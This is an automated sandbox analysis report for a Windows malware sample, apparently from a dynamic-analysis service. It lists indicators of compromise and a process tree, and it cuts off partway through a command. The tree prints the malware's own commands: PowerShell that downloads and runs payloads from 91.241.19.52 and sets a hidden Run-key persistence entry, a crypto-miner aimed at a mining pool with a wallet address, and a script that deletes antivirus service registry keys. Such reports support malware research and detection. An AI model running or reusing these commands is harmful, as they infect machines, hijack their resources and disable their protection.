310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e fsucenter.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
6c0aa25e7a4fe66a0cd648fcd8728b52.exepid process 2400 6c0aa25e7a4fe66a0cd648fcd8728b52.exe 2400 6c0aa25e7a4fe66a0cd648fcd8728b52.exe 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3008 -
Suspicious behavior: MapViewOfSection 19 IoCs
Processes:
6c0aa25e7a4fe66a0cd648fcd8728b52.exepid process 2400 6c0aa25e7a4fe66a0cd648fcd8728b52.exe 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 3008 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
8563.exeWerFault.exeWerFault.exeWerFault.exeA0B0.exepowershell.exeexplorer.exeWerFault.exedescription pid process Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeDebugPrivilege 572 8563.exe Token: SeRestorePrivilege 2112 WerFault.exe Token: SeBackupPrivilege 2112 WerFault.exe Token: SeDebugPrivilege 2112 WerFault.exe Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 Token: SeDebugPrivilege 2784 WerFault.exe Token: SeDebugPrivilege 3764 WerFault.exe Token: SeDebugPrivilege 2644 A0B0.exe Token: SeDebugPrivilege 2448 powershell.exe Token: SeDebugPrivilege 3224 explorer.exe Token: SeDebugPrivilege 4064 WerFault.exe Token: SeShutdownPrivilege 3008 Token: SeCreatePagefilePrivilege 3008 -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
7CC7.tmppid process 2740 7CC7.tmp -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 3008 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
6c0aa25e7a4fe66a0cd648fcd8728b52.exe7CC7.exe7CC7.tmp7CC7.exe7CC7.tmp898B.exeRuntimebroker.exedescription pid process target process PID 3972 wrote to memory of 2400 3972 6c0aa25e7a4fe66a0cd648fcd8728b52.exe 6c0aa25e7a4fe66a0cd648fcd8728b52.exe PID 3972 wrote to memory of 2400 3972 6c0aa25e7a4fe66a0cd648fcd8728b52.exe 6c0aa25e7a4fe66a0cd648fcd8728b52.exe PID 3972 wrote to memory of 2400 3972 6c0aa25e7a4fe66a0cd648fcd8728b52.exe 6c0aa25e7a4fe66a0cd648fcd8728b52.exe PID 3972 wrote to memory of 2400 3972 6c0aa25e7a4fe66a0cd648fcd8728b52.exe 6c0aa25e7a4fe66a0cd648fcd8728b52.exe PID 3972 wrote to memory of 2400 3972 6c0aa25e7a4fe66a0cd648fcd8728b52.exe 6c0aa25e7a4fe66a0cd648fcd8728b52.exe PID 3972 wrote to memory of 2400 3972 6c0aa25e7a4fe66a0cd648fcd8728b52.exe 6c0aa25e7a4fe66a0cd648fcd8728b52.exe PID 3008 wrote to memory of 1076 3008 7CC7.exe PID 3008 wrote to memory of 1076 3008 7CC7.exe PID 3008 wrote to memory of 1076 3008 7CC7.exe PID 1076 wrote to memory of 2680 1076 7CC7.exe 7CC7.tmp PID 1076 wrote to memory of 2680 1076 7CC7.exe 7CC7.tmp PID 1076 wrote to memory of 2680 1076 7CC7.exe 7CC7.tmp PID 2680 wrote to memory of 4016 2680 7CC7.tmp 7CC7.exe PID 2680 wrote to memory of 4016 2680 7CC7.tmp 7CC7.exe PID 2680 wrote to memory of 4016 2680 7CC7.tmp 7CC7.exe PID 4016 wrote to memory of 2740 4016 7CC7.exe 7CC7.tmp PID 4016 wrote to memory of 2740 4016 7CC7.exe 7CC7.tmp PID 4016 wrote to memory of 2740 4016 7CC7.exe 7CC7.tmp PID 3008 wrote to memory of 572 3008 8563.exe PID 3008 wrote to memory of 572 3008 8563.exe PID 3008 wrote to memory of 572 3008 8563.exe PID 3008 wrote to memory of 2044 3008 898B.exe PID 3008 wrote to memory of 2044 3008 898B.exe PID 3008 wrote to memory of 2044 3008 898B.exe PID 3008 wrote to memory of 2724 3008 8EFA.exe PID 3008 wrote to memory of 2724 3008 8EFA.exe PID 3008 wrote to memory of 2724 3008 8EFA.exe PID 2740 wrote to memory of 3588 2740 7CC7.tmp fsucenter.exe PID 2740 wrote to memory of 3588 2740 7CC7.tmp fsucenter.exe PID 2740 wrote to memory of 3588 2740 7CC7.tmp fsucenter.exe PID 3008 wrote to memory of 3092 3008 942B.exe PID 3008 wrote to memory of 3092 3008 942B.exe PID 3008 wrote to memory of 3092 3008 942B.exe PID 2044 wrote to memory of 900 2044 898B.exe Runtimebroker.exe PID 2044 wrote to memory of 900 2044 898B.exe Runtimebroker.exe PID 2044 wrote to memory of 900 2044 898B.exe Runtimebroker.exe PID 3008 wrote to memory of 2204 3008 9B60.exe PID 3008 wrote to memory of 2204 3008 9B60.exe PID 3008 wrote to memory of 2204 3008 9B60.exe PID 3008 wrote to memory of 2644 3008 A0B0.exe PID 3008 wrote to memory of 2644 3008 A0B0.exe PID 3008 wrote to memory of 2644 3008 A0B0.exe PID 900 wrote to memory of 2448 900 Runtimebroker.exe powershell.exe PID 900 wrote to memory of 2448 900 Runtimebroker.exe powershell.exe PID 900 wrote to memory of 2448 900 Runtimebroker.exe powershell.exe PID 3008 wrote to memory of 3412 3008 explorer.exe PID 3008 wrote to memory of 3412 3008 explorer.exe PID 3008 wrote to memory of 3412 3008 explorer.exe PID 3008 wrote to memory of 3412 3008 explorer.exe PID 3008 wrote to memory of 2792 3008 explorer.exe PID 3008 wrote to memory of 2792 3008 explorer.exe PID 3008 wrote to memory of 2792 3008 explorer.exe PID 3008 wrote to memory of 2980 3008 explorer.exe PID 3008 wrote to memory of 2980 3008 explorer.exe PID 3008 wrote to memory of 2980 3008 explorer.exe PID 3008 wrote to memory of 2980 3008 explorer.exe PID 3008 wrote to memory of 1300 3008 explorer.exe PID 3008 wrote to memory of 1300 3008 explorer.exe PID 3008 wrote to memory of 1300 3008 explorer.exe PID 3008 wrote to memory of 3224 3008 explorer.exe PID 3008 wrote to memory of 3224 3008 explorer.exe PID 3008 wrote to memory of 3224 3008 explorer.exe PID 3008 wrote to memory of 3224 3008 explorer.exe PID 900 wrote to memory of 1108 900 Runtimebroker.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\6c0aa25e7a4fe66a0cd648fcd8728b52.exe"C:\Users\Admin\AppData\Local\Temp\6c0aa25e7a4fe66a0cd648fcd8728b52.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\6c0aa25e7a4fe66a0cd648fcd8728b52.exe"C:\Users\Admin\AppData\Local\Temp\6c0aa25e7a4fe66a0cd648fcd8728b52.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\7CC7.exeC:\Users\Admin\AppData\Local\Temp\7CC7.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-3PUS4.tmp\7CC7.tmp"C:\Users\Admin\AppData\Local\Temp\is-3PUS4.tmp\7CC7.tmp" /SL5="$6002E,4193427,831488,C:\Users\Admin\AppData\Local\Temp\7CC7.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7CC7.exe"C:\Users\Admin\AppData\Local\Temp\7CC7.exe" /VERYSILENT3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-5UNKH.tmp\7CC7.tmp"C:\Users\Admin\AppData\Local\Temp\is-5UNKH.tmp\7CC7.tmp" /SL5="$80062,4193427,831488,C:\Users\Admin\AppData\Local\Temp\7CC7.exe" /VERYSILENT4⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\install.exe"C:\ProgramData\Data\install.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\ProgramData\Data\install.exe"C:\ProgramData\Data\install.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Drops file in System32 directory
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WimBootCompress\WerFault.exe"C:\Windows\SysWOW64\WimBootCompress\WerFault.exe"8⤵
- Executes dropped EXE
-
C:\ProgramData\Systemd\HostData.exeNULL6⤵
- Executes dropped EXE
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
-
C:\ProgramData\Data\Database.exe-pool etc.2miners.com:1010 -wal 0xAB47706984A447d19722CD3565B145e1e34CA7F0 -worker Worker -pass password6666⤵
-
C:\Users\Admin\AppData\Local\Temp\8563.exeC:\Users\Admin\AppData\Local\Temp\8563.exe1⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\898B.exeC:\Users\Admin\AppData\Local\Temp\898B.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Runtimebroker.exe"C:\ProgramData\Runtimebroker.exe"2⤵
- Executes dropped EXE
- Drops startup file
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'Sound device' -Value 'Cmd.Exe /c POwERsheLl -WinD HIDDen -CoMmAN (New-Object System.Net.WebClient).DownloadFile((''http://91.241.19.52/Ru''+''nti''+''m''+''ebr''+''oke''+''r.exe''),($env:TEMP+''\Vp''+''nm.e''+''xe''));Start-Process ($env:TEMP+''\V''+''pn''+''m.exe'')'3⤵
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell $dll =[Reflection.Assembly]::Load((New-Object System.Net.WebClient).DownloadData('http://91.241.19.52/Api/GetFile2'));$theType = $dll.GetType('filedll.Program');$method = $theType.GetMethod('Start');$method.Invoke([System.Activator]::CreateInstance($theType),@());rv dll,theType,method3⤵
- Blocklisted process makes network request
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" @echo off Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE2.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\KSDE1.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP18.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP17.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP16.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP15.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP14.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP13.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP12.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP11.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\AVP10.0.0" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\MBAMService" /f Reg Delete "HKLM\SYSTEM\CurrentControlSet\services\McAWFwk" /f Reg Delete 